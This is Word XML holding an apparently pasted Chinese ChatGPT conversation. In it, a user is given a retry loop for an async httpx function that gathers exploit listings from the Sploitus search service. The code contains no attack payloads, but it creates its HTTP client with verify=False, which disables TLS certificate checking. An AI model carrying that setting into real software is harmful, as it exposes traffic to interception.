    <w:p w14:paraId="0501DE7F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C16FB3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6FD65" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                # single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E93DD97" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8B1CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    log_data.success(str(len(res_list))+"  "+str(res_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9543F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return res_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置网络连接的报错重连机制？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1C1C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED33D9E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EF9FD4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用网络请求库的时候，通常我们需要处理两类错误：一类是网络级别的错误，如连接错误、超时错误等；另一类是应用级别的错误，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误状态码等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD36227" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77695FB6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里，我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>try-except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构来捕获并处理这些错误。另外，为了实现重试机制，我们可以使用一个循环，当发生错误时，继续在循环中重新发起请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2089B88A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E793D81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39609E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703C76AC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA18644" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8BA32" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global STOP_FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBBB53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> res_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E2A9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C55E3E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBD3382" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for attempt in range(MAX_RETRIES):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286DEAE7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD9703E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3C992" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                response = await client.post(url=url, json=data, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48D815" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                response.raise_for_status()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若状态码不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189662CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58ABF5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        except (httpx.ConnectTimeout, httpx.ReadTimeout, httpx.ConnectError):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9C845" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对网络级别的错误进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814D8FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            log_debug.warning("Network error occurred. Retrying...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4EDD4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB48CEC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528F0856" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        except httpx.HTTPStatusError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FAA7A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对应用级别的错误进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BDEFE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            log_debug.warning(f"HTTP error occurred: {response.status_code}. Retrying...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026737E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E296B9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06121A6A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C06B5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若未发生异常，则跳出循环，处理返回的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA426B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02D5AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBCFF2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果重试了指定的次数仍然失败，那么抛出异常或者返回错误信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5540D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        log_debug.error("Max retries exceeded. Exiting...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A64818" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728A499" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3F604B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面的代码处理返回的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DE77F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486F390" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AC209" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if len(exps)&lt;10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132D4AD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        STOP_FLAG = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161598A3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log_debug.info("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本页匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不足</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>STOP_FLAG = True")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D6A00" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D285D9A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009BA5C8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            # single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E338C0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            res_list.append(single_exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A909083" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    log_data.success(str(len(res_list))+"  "+str(res_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2704C30A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return res_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB1B1D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310C287D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAX_RETRIES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个常量，代表最大重试次数。你需要在代码中定义这个常量，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAX_RETRIES = 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A0E1D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777C4C0B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，这个重试机制只是一个基本的版本，实际上你可能需要根据你的具体需求对其进行修改和扩展。例如，你可能需要添加一个等待时间在每次重试之间，或者你可能需要处理其他类型的错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E3635" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F284F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部没有实现报错重试的机制吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3DF5C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC87EB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF6FE64" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库提供了强大的功能，包括支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接，自动连接池管理，基于标准库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和内容编码的支持，自动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理等。然而，到我知识库更新为止（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库并没有内置的重试机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A08C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7EF0CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，为网络请求添加重试机制通常需要自己实现，如上一条回复中所示。另外，也可以使用一些第三方库来帮助实现这个功能，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenacity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库。这是一个通用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>重试库，可以很方便地添加重试机制到你的代码中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E847F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381D3BED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但请注意，这些信息可能在未来改变，你可以查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的官方文档或者相关社区获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490B63C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EABEC0B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何看</w:t>
